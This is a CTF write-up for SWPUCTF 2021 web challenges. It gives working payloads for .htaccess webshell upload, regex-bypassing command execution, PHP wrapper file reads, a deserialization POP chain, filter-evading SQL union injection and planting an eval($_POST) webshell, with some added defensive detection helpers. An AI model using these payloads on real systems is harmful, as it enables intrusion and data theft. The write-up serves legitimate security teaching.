[SWPUCTF 2021 新生赛] Third batch of challenges
[SWPUCTF 2021 新生赛]easyupload3.0
First, trigger an error somehow, for example by requesting a page that does not exist to get a Not Found page. The error page reveals Apache/2.4.7 (Ubuntu). Since it is Apache, use a .htaccess file to get a shell.
Create a .htaccess file with the following content:
<FilesMatch "123.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
This makes Apache parse any file whose name contains the string "123.jpg" as PHP.
Upload the .htaccess file first, then upload 123.jpg containing a one-line webshell, and connect with AntSword (蚁剑).
Flag obtained.
[SWPUCTF 2021 新生赛]finalrce
<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url)){
        echo "Sorry,you can't use this.";
    }else{
        echo "Can you see anything?";
        exec($url);
    }
}
Code audit: I had no idea at all. Other writeups use the Linux tee command.
The exec function executes a command. Looking carefully, although the challenge filters a lot, the | character is not filtered, and exec returns no output to the page. So the idea is to use the Linux tee command: pipe the command we want to run through tee so its output is written into a file, then visit that file to read the result.
Pass in command | tee file.txt.
?url=l\s / | tee 1.txt, then visit the file 1.txt we passed in and see that the command was executed; we see flllllaaaaaaggggggg.
tac is not filtered. Next pass in ?url=tac /flllll\aaaaaaggggggg | 2.txt
Visit 2.txt.
Flag obtained.
[SWPUCTF 2021 新生赛]hardrce
<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];
    foreach ($blacklist as $blackitem){
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
            die("LTLT说不能用这些奇奇怪怪的符号哦!");
        }
    }
    if(preg_match('/[a-zA-Z]/is',$wllm))
    {
        die("Ra's Al Ghul说不能用字母哦!");
    }
    echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
    eval($wllm);
}
else
{
    echo "蔡总说:注意审题!!!";
}
?>
To bypass the blacklist and the regex that rejects letters, see this blog post: 无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)_yu22x的博客-CSDN博客
Once past the filters, our input is executed as PHP code by eval().
First pass in system(ls /);
i.e. ?wllm=~(~%8C%86%8C%8B%9A%92)(~%93%8c%df%d0);
Then pass in tac flllllaaaaaaggggggg.
?wllm=~(~%8C%86%8C%8B%9A%92)(~%8b%9e%9c%df%d0%99%93%93%93%93%93%9e%9e%9e%9e%9e%9e%98%98%98%98%98%98%98);
Flag obtained.
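The letter blacklist above is bypassed because PHP's ~ on a string flips every byte, so the request carries only high (non-ASCII) bytes. For log review or a WAF rule, the useful check is to undo that inversion and see what the request really calls. The helper below is an added example, not part of the original writeup; the two sample payloads are the ones quoted above and the heuristic name is my own.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed samples: the two wllm parameters quoted in this writeup.
PAYLOAD_LS = "~(~%8C%86%8C%8B%9A%92)(~%93%8c%df%d0);"
PAYLOAD_TAC = ("~(~%8C%86%8C%8B%9A%92)(~%8b%9e%9c%df%d0%99%93%93%93%93%93"
               "%9e%9e%9e%9e%9e%9e%98%98%98%98%98%98%98);")


def decode_inverted_segments(param: str) -> list:
    """Return the plaintext of every ~<high-byte run> segment in a query value.

    PHP applies bitwise NOT to each byte of the string, so a run of bytes in
    0x80..0xFF after '~' is an ASCII string XORed with 0xFF.  Reversing it
    shows the function name and argument the eval() would actually execute.
    """
    raw = unquote_to_bytes(param)          # handles upper and lower case %XX
    decoded = []
    for m in re.finditer(rb'~([\x80-\xff]+)', raw):
        decoded.append(bytes(b ^ 0xFF for b in m.group(1)).decode('ascii'))
    return decoded


def looks_like_not_obfuscated_call(param: str) -> bool:
    """Detection heuristic (assumed, not from the page): '~(' at the start and a
    ')(~<high bytes>)' call shape, i.e. (~"name")(~"arg")."""
    raw = unquote_to_bytes(param)
    return raw.startswith(b'~(') and bool(re.search(rb'\)\(~[\x80-\xff]+\)', raw))
```

Because a legitimate parameter for this endpoint never needs bytes above 0x7F, rejecting any high byte before eval() (or, better, not calling eval() on user input at all) removes the whole bypass class rather than chasing individual symbols.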
[SWPUCTF 2021 新生赛]PseudoProtocols
The challenge URL takes a parameter wllm and tells us to find hint.php. Use the PHP filter pseudo-protocol to read the contents of hint.php:
?wllm=php://filter/read=convert.base64-encode/resource=hint.php
Visit /test2222222222222.php.
<?php
ini_set("max_execution_time", "180");
show_source(__FILE__);
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){echo "success\n";echo $flag;
}
?>
The a parameter is opened read-only with file_get_contents(), and the content read must equal the string "I want flag" before the code below outputs the flag.
Since the parameter is opened with file_get_contents() and the check reads like a file inclusion, the data:// pseudo-protocol naturally comes to mind.
Construct ?a=data://text/plain;base64,SSB3YW50IGZsYWc= . Flag obtained.
[SWPUCTF 2021 新生赛]pop
<?php
error_reporting(0);
show_source("index.php");
class w44m{
    private $admin = 'aaa';
    protected $passwd = '123456';
    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}
class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}
class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}
$w00m = $_GET['w00m'];
unserialize($w00m);
?>
Construct the POP chain.
<?php
class w44m{
    private $admin = 'w44m';
    protected $passwd = '08067';
}
class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}
class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}
$a = new w22m();
$a->w00m = new w33m();
$a->w00m->w00m=new w44m();
$a->w00m->w22m='Getflag';
echo urlencode(serialize($a));?>
Pass the output into the w00m parameter to get the flag.
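The chain works because unserialize() will instantiate any class named in the input, so w22m's __destruct reaches w33m::__toString and from there calls w44m::Getflag. A defender's gate is to list the classes an input would instantiate before handing it to unserialize() and refuse anything outside an allow-list (PHP's own equivalent is the allowed_classes option). The parser below is an added example, not part of the original writeup; SAMPLE is the serialized chain produced by the script above, with the NUL markers PHP puts in private and protected property names.

```python
import re

# Constructed sample: the serialized w22m -> w33m -> w44m chain from this writeup.
SAMPLE = ('O:4:"w22m":1:{s:4:"w00m";O:4:"w33m":2:{s:4:"w00m";O:4:"w44m":2:{'
          's:11:"\x00w44m\x00admin";s:4:"w44m";s:9:"\x00*\x00passwd";s:5:"08067";}'
          's:4:"w22m";s:7:"Getflag";}}')


def _parse(data: str, pos: int, classes: list) -> int:
    """Parse one PHP-serialized value at pos, collecting object class names.
    Returns the index just after the value.  Note: s: lengths are byte
    lengths in PHP; this helper assumes single-byte characters."""
    tag = data[pos]
    if tag == 'N':                                  # N;
        return pos + 2
    if tag in 'ibd':                                # i:1;  b:1;  d:1.5;
        return data.index(';', pos) + 1
    if tag == 's':                                  # s:LEN:"...";
        m = re.match(r's:(\d+):"', data[pos:])
        start = pos + m.end()
        return start + int(m.group(1)) + 2          # skip closing quote and ';'
    if tag == 'a':                                  # a:COUNT:{key;value;...}
        m = re.match(r'a:(\d+):\{', data[pos:])
        pos += m.end()
        for _ in range(int(m.group(1)) * 2):
            pos = _parse(data, pos, classes)
        return pos + 1                              # closing '}'
    if tag == 'O':                                  # O:LEN:"Class":COUNT:{...}
        m = re.match(r'O:(\d+):"([^"]*)":(\d+):\{', data[pos:])
        classes.append(m.group(2))
        pos += m.end()
        for _ in range(int(m.group(3)) * 2):
            pos = _parse(data, pos, classes)
        return pos + 1
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")


def object_classes(serialized: str) -> list:
    """Every class the input would instantiate, outermost first."""
    classes = []
    if _parse(serialized, 0, classes) != len(serialized):
        raise ValueError("trailing data after serialized value")
    return classes


def is_safe_to_unserialize(serialized: str, allowed: frozenset) -> bool:
    """Allow-list gate: malformed input or any class outside `allowed` is rejected."""
    try:
        return all(c in allowed for c in object_classes(serialized))
    except (ValueError, AttributeError, IndexError):
        return False
```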
[SWPUCTF 2021 新生赛]sql
Passing ?wllm=1 %23 shows that spaces are filtered; bypass with /**/. The column count is found to be 3.
Further queries show that = is also filtered; bypass with like.
Construct the payload: ?wllm=-1'union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema/**/like(database())%23
This returns the table names.
and is also filtered, so replace table_schema with table_name to get the column names.
Construct the payload: ?wllm=-1'union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name/**/like("LTLT_flag")%23
This returns the column names.
Construct the payload again: ?wllm=-1'union/**/select/**/1,group_concat(id,flag),3/**/from/**/LTLT_flag%23
Flag obtained.
However, the flag is incomplete. The right function is blocked; other writeups use the mid function to slice the string.
Construct:
?wllm=-1'union/**/select/**/1,mid(group_concat(id,flag),1,20),3/**/from/**/LTLT_flag%23
?wllm=-1'union/**/select/**/1,mid(group_concat(id,flag),21,40),3/**/from/**/LTLT_flag%23
?wllm=-1'union/**/select/**/1,mid(group_concat(id,flag),41,60),3/**/from/**/LTLT_flag%23
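Each filter in this challenge (spaces, =, and) is defeated by a one-for-one substitution, which is why keyword blacklists are a poor defence and parameterised queries are the real fix. Where a detection layer is still wanted, it has to normalise the evasions first; the helper below is an added example, not part of the original writeup, and its indicator names are my own. It uses the first union payload from above as the constructed sample.

```python
import re
from urllib.parse import unquote

# Constructed samples: the first union payload from this writeup and a benign id.
MALICIOUS = ("-1'union/**/select/**/1,group_concat(table_name),3/**/from/**/"
             "information_schema.tables/**/where/**/table_schema/**/like(database())%23")
BENIGN = "42"


def normalize(value: str) -> str:
    """Undo the evasions used in this challenge before matching:
    URL decoding, inline comments standing in for whitespace, and case."""
    v = unquote(value)
    v = re.sub(r'/\*.*?\*/', ' ', v)      # MySQL treats /**/ as a token separator
    v = re.sub(r'\s+', ' ', v)
    return v.lower()


# Indicator name -> regex applied to the normalised value.
INDICATORS = {
    "union_select": r"\bunion\b.*\bselect\b",
    "schema_probe": r"\binformation_schema\b",
    "like_as_equals": r"\blike\s*\(",       # like(...) substituted for a blocked '='
    "comment_terminator": r"#|--\s|/\*$",   # %23 decodes to '#' and ends the query
}


def sqli_indicators(value: str) -> list:
    """Names of every indicator that fires on the normalised parameter value."""
    v = normalize(value)
    return [name for name, rx in INDICATORS.items() if re.search(rx, v)]
```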
[SWPUCTF 2021 新生赛]hardrce_3
Both hardrce challenges draw on yu's blog post: 无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)_yu22x的博客-CSDN博客
<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\^','\~','\|'];
    foreach ($blacklist as $blackitem){
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
            die("小伙子只会异或和取反?不好意思哦LTLT说不能用!!");
        }
    }
    if(preg_match('/[a-zA-Z0-9]/is',$wllm))
    {
        die("Ra'sAlGhul说用字母数字是没有灵魂的!");
    }
    echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
    eval($wllm);
}
else
{
    echo "蔡总说:注意审题!!!";
}
?>
Compared with the previous hardrce, this one also forbids ~, |, ^ and spaces.
So this challenge uses yu's self-increment technique.
The fixed-format construction yields assert($_POST[_]);
Then POST _=phpinfo();
It must be URL-encoded when used.
We find that system, exec, shell_exec, popen, proc_open and passthru are disabled.
But file_put_contents(,) is still available.
The first argument of file_put_contents is the filename and the second is the content.
So construct and pass in: _=file_put_contents("1.php","<?php eval($_POST['shell']); ?>");